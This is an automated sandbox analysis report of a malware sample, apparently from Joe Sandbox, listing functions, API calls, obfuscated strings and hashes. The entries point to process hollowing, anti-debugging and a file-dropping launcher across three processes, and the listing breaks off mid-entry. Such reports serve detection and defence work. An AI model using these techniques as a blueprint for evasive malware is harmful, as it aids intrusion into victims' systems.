Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 6d4db09bf21c6d62214a76c5b19908198ecff72c81cba0794fc870036ef2183e
Instruction ID: 503b14a4ff5a58c29bf9d4b47e2c5c06c710a9d12af6e6dbf0019fbbea8dee93
Opcode Fuzzy Hash: 6d4db09bf21c6d62214a76c5b19908198ecff72c81cba0794fc870036ef2183e
Instruction Fuzzy Hash: A0116175640209BFEB00DFA4DC55FEEB7BDEB48714F5084A1B904D7250EA34AA509B60

Function 02B68400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B68471

Strings

yromeMlautriVdaeRtN, xrefs: 02B6841B
ntdll, xrefs: 02B68448

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2004920654-737317276
Opcode ID: aa5fff3b3843e93ffc6a610d9a87a5a3efa957609707e8ff6fb3a920621a8106
Instruction ID: 6ad33e79621f1ed7d77b3ce85636fc0c1452b0868a353381f607df209345386e
Opcode Fuzzy Hash: aa5fff3b3843e93ffc6a610d9a87a5a3efa957609707e8ff6fb3a920621a8106
Instruction Fuzzy Hash: E7018075640208AFDB00EFA8DC45FAEB7FDEB4D710F508490F904D7600DA38A9148B20

Function 02B67D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B67DEC

Strings

Ntdll, xrefs: 02B67DC3
yromeMlautriVetirW, xrefs: 02B67D93

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 4260932595-3542721025
Opcode ID: 43bd846a7c8c3f49da55479043e1e6fe1f238d8eb8434572d358442209ec9e87
Instruction ID: b66398513ac97ad9fe6b47d2a75a8941fac17f15f994b3ca7da4ec0e6474ce7c
Opcode Fuzzy Hash: 43bd846a7c8c3f49da55479043e1e6fe1f238d8eb8434572d358442209ec9e87
Instruction Fuzzy Hash: AD018075640204AFDB00EF98EC45FAAB7FDEB4D714F5088D1B900DB640DA38AD149F60

Function 02B68670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02B686D5

Strings

noitceSfOweiVpamnUtN, xrefs: 02B6868B
ntdll, xrefs: 02B686B8

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 50dc4a7787a205b3d3986658fc6126c5904194b002d5b7f199874c5993eaff11
Instruction ID: 693ed5516d9b42044446d5a41304c81304a2cd15bf8f0af634c31794b3f91d88
Opcode Fuzzy Hash: 50dc4a7787a205b3d3986658fc6126c5904194b002d5b7f199874c5993eaff11
Instruction Fuzzy Hash: D201D634640204BFEB00EFA4EC55FAEB7FEEB48710F5084E0B900DB600EA38A905DE14

Function 02B686F7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02B686D5

Strings

ntdll, xrefs: 02B686B8

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: ntdll
API String ID: 2801472262-3337577438
Opcode ID: 897912416ed9d42bc7d2b13a651af03c09ed6a10c58ea80576d334bfb1d49c72
Instruction ID: e43845b96aa039231a62087338ce941ae0ce12d7bebc3de2763e7ceffd8561af
Opcode Fuzzy Hash: 897912416ed9d42bc7d2b13a651af03c09ed6a10c58ea80576d334bfb1d49c72
Instruction Fuzzy Hash: C8F09674940204EFDB00FFB4E945AEDB7FAEB48754F5085E5A804DB210EA38AA45DF10

Function 02B68788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B68814

Strings

CreateProcessAsUserW, xrefs: 02B687A1
Kernel32, xrefs: 02B687D3

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressCreateHandleModuleProcProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 4105707577-2353454454
Opcode ID: bc658f81111103d0201b721671443f0c6e5e21e3cf97d428f8b64dd881e1c34c
Instruction ID: 3ec3944ca49169cb10135cdbdcaa94aff0b630c0a79d039ba5760c306ee60646
Opcode Fuzzy Hash: bc658f81111103d0201b721671443f0c6e5e21e3cf97d428f8b64dd881e1c34c
Instruction Fuzzy Hash: 6E11D3B2640248AFEB40EEA8DC45FEA77EDEB0C750F5144A0BA08D7200D638FD559B64

Function 02B6F744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B6F77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02B6F760
KernelBase, xrefs: 02B6F74F

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 3662101638-539270669
Opcode ID: 0ab2b5b903f7252d7ee8d0db72627cc49669396f9df81b15b5b4d64e12211b26
Instruction ID: 66a1428c6f17037a21d36516d042824d0b5b0f19469fe8700b0f1de239ee1224
Opcode Fuzzy Hash: 0ab2b5b903f7252d7ee8d0db72627cc49669396f9df81b15b5b4d64e12211b26
Instruction Fuzzy Hash: 1FF0EC70904258BAEB11A7F89C8C7FCFBF9DB05329F6443E0E836625D1E7790640CA51

Non-executed Functions

Function 02B68338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B683C2), ref: 02B683A4

Strings

Kernel32, xrefs: 02B68383
FlushInstructionCache, xrefs: 02B68351

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressCacheFlushHandleInstructionModuleProc
String ID: FlushInstructionCache$Kernel32
API String ID: 2392256011-184458249
Opcode ID: 1dc74eb02c1b040375829037276c986da9fc6ae2be3e0fbd63e6d165327dced3
Instruction ID: ebac7ae5a5e4af0f1f0819bc1510d8dad63c0c23daacf79eaba7018453411bd3
Opcode Fuzzy Hash: 1dc74eb02c1b040375829037276c986da9fc6ae2be3e0fbd63e6d165327dced3
Instruction Fuzzy Hash: 9E018171680304BFEB10EFA4DC55FAA77EDE708B10F6184A0F904D7650DA78AD559B24

Function 02B68274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 02B682D9

Strings

Kernel32, xrefs: 02B682BC
sserddAcorPteG, xrefs: 02B6828F

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressProc
String ID: Kernel32$sserddAcorPteG
API String ID: 190572456-1372893251
Opcode ID: c232869aba990d9f18db04929400e3b487e82e9d9323e8afe7ed0129cfcbec92
Instruction ID: 1a7e368822440cec5d8fb66b2323c2778332cffe81e88b79efaa7d6d0cf54d88
Opcode Fuzzy Hash: c232869aba990d9f18db04929400e3b487e82e9d9323e8afe7ed0129cfcbec92
Instruction Fuzzy Hash: 8B014F75640314AFEB00EFA4EC55FEEB7FEEB48B10F5184E0B900DB640EA74A945DA24

Function 02B681CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Strings

AeldnaHeludoMteG, xrefs: 02B681E5
KernelBASE, xrefs: 02B68205

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1646373207-1952140341
Opcode ID: f7434142d19014871d46a549609282ce0b93fdfbcda1a74237943d600bcf3f35
Instruction ID: 15c0575565c7d6b129a5cd9c4a8dd95eba5a0e00fb86071dfb4914e1aac1148c
Opcode Fuzzy Hash: f7434142d19014871d46a549609282ce0b93fdfbcda1a74237943d600bcf3f35
Instruction Fuzzy Hash: 69F09671A84704BFEB00EFA4DC15AADF7FDE74A75075148E1B800C7610EA34AE149925

Analysis Process: lxsyrsiW.pifPID: 7484, Parent PID: 7440COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401411, 00401414
D`:vD`:v, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Analysis Process: neworigin.exePID: 7536, Parent PID: 7484COMMON

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	214
Total number of Limit Nodes:	29

Executed Functions

Function 061D7E78 Relevance: 3.0, Strings: 2, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 061D8413
$]q, xrefs: 061D841F

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 83631cd3d92fa4419db62a3ae0febf264132eee77d0e8430fcc415da7064433f
Instruction ID: 072e4f46e429dba4623a65e5e4c40e1833c9902165a92560741171e937830339
Opcode Fuzzy Hash: 83631cd3d92fa4419db62a3ae0febf264132eee77d0e8430fcc415da7064433f
Instruction Fuzzy Hash: D3026F31B002059FDB94DFA8D590AAEB7F6EF84304F148929E4199B394DB35EC46CB91

Function 061C1B48 Relevance: 1.6, Strings: 1, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nKuq, xrefs: 061C1BC8

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID: nKuq
API String ID: 0-4080595220
Opcode ID: bcc7cbb9c9a5d8a135bb967d5f44267ae2078091c52a1f35d36e853a4fafaf63
Instruction ID: 6731ce2577a892d48e76389876050a45b105260f7f5f803767aa0a9071cf9675
Opcode Fuzzy Hash: bcc7cbb9c9a5d8a135bb967d5f44267ae2078091c52a1f35d36e853a4fafaf63
Instruction Fuzzy Hash: 55B1C271E00219AFDB64DFA9C8457AEBBB6FF89320F10452EE909E7291D7349901CBD1

Function 061DC2A0 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3432076eb15250e5ff5ca84e7292a5ea765fff5a173b1bedf785d5a924462a89
Instruction ID: 7a6d67b14328c6311a490593c1927797c47d91af17b0d74b14d1e2b42654e3ad
Opcode Fuzzy Hash: 3432076eb15250e5ff5ca84e7292a5ea765fff5a173b1bedf785d5a924462a89
Instruction Fuzzy Hash: ED329230B002059FDF54DFA8D990AAEB7B6FB88310F108925E405EB399DB34EC46CB91

Function 061D56B8 Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72094a0d1728b56b37726b235d618137031376c20968b65d39ae9eff61a94903
Instruction ID: bb34b8b3f8d32ccb5297ec26db3edf0e45e87d4cd4a2a2a2aaae55d81bca6568
Opcode Fuzzy Hash: 72094a0d1728b56b37726b235d618137031376c20968b65d39ae9eff61a94903
Instruction Fuzzy Hash: CD12C175F002159FDF64DBA4D9806AEBBB3EF84310F248829E55A9B384DB34DD42CB91

Function 061D9250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 061D92DE
$]q, xrefs: 061D92A3
$]q, xrefs: 061D9297
$]q, xrefs: 061D92D2

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: b9d909590b96f54a45a5bf443cf1f2c74596b939fd4acc0c4a657e210f58887f
Instruction ID: edbefba3164e0987c70c0768f623bb4a3e5543bc4ce970acff3d629ff2b873a6
Opcode Fuzzy Hash: b9d909590b96f54a45a5bf443cf1f2c74596b939fd4acc0c4a657e210f58887f
Instruction Fuzzy Hash: 67916F30B1020A9FDB54DFA4D990BAE77B6AF84204F118965C819EB348EF74DD468B91

Function 061C0802 Relevance: 2.7, Strings: 2, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 061C09EA
(&]q, xrefs: 061C092B

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID: (&]q$(aq
API String ID: 0-1602648543
Opcode ID: 66e24b680683632158e9c642b9b1ee9982cdb0fec6ea11f996acb7e310d03e70
Instruction ID: 1f10250d47f048c649071af8f756a2f8fa647c73d702da73cee5a610f5bd3646
Opcode Fuzzy Hash: 66e24b680683632158e9c642b9b1ee9982cdb0fec6ea11f996acb7e310d03e70
Instruction Fuzzy Hash: FE71B131F002199BDB55DFB8D850AEFBBB6AF98750F14842AE805AB380DF309D42C795

Function 061D9241 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 061D9297
$]q, xrefs: 061D92D2

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 9e32be205690ffb5c4fd0e64044e04e1dd20a8d253a4b7932a31935621f5bff8
Instruction ID: 1c13ad6e671ef1834212c094543a2f83650f132903bbff79da6db235e18818ff
Opcode Fuzzy Hash: 9e32be205690ffb5c4fd0e64044e04e1dd20a8d253a4b7932a31935621f5bff8
Instruction Fuzzy Hash: 7E518030B112059FDB55DBB4D990BAE77F2AF88204F108969C819EB388EF34DC068B91

Function 0252EF18 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2421489889.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2520000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a137c54f231353e2f486d817b7d98e3e367df19b9676981d6688b93370507f52
Instruction ID: da09fc53370118a0cdd5d380df6fe67a67660c2ad7ebe56347856af8dbe5834f
Opcode Fuzzy Hash: a137c54f231353e2f486d817b7d98e3e367df19b9676981d6688b93370507f52
Instruction Fuzzy Hash: 6E413472D147998FCB10CFB9D4442EEBBF1FF9A310F14856AD418A7280DB74A889CB94

Function 0252EFE8 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0252F057

Memory Dump Source

Source File: 0000001A.00000002.2421489889.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2520000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f53ce186764ad99c4a045cccc2bb151c00001bdfa0a3cf7e3d336c1d02732358
Instruction ID: ec1cd2fb18762ca9c6d3e97dd18fa7a1243f4d5764e807810342e0a6fdab0c39
Opcode Fuzzy Hash: f53ce186764ad99c4a045cccc2bb151c00001bdfa0a3cf7e3d336c1d02732358
Instruction Fuzzy Hash: 841133B1C006599FCB10CFAAD544BEEFBB4BF48310F11816AE818A7240C378A945CFA5

Function 061C0040 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

PH]q, xrefs: 061C01BE

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 15ab242ec565678b59f00611778443335b1296accf72e38770d377d319db611f
Instruction ID: e77e1e19b26dda48dbb3be9b629b5ab6260905fdaf836799961270416e23d96a
Opcode Fuzzy Hash: 15ab242ec565678b59f00611778443335b1296accf72e38770d377d319db611f
Instruction Fuzzy Hash: 7241E231B10205CFDF585B7898506BE77A6AB88365F24482DD406DB384EF36CD82C791

Function 061C298E Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

PH]q, xrefs: 061C2AD8

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

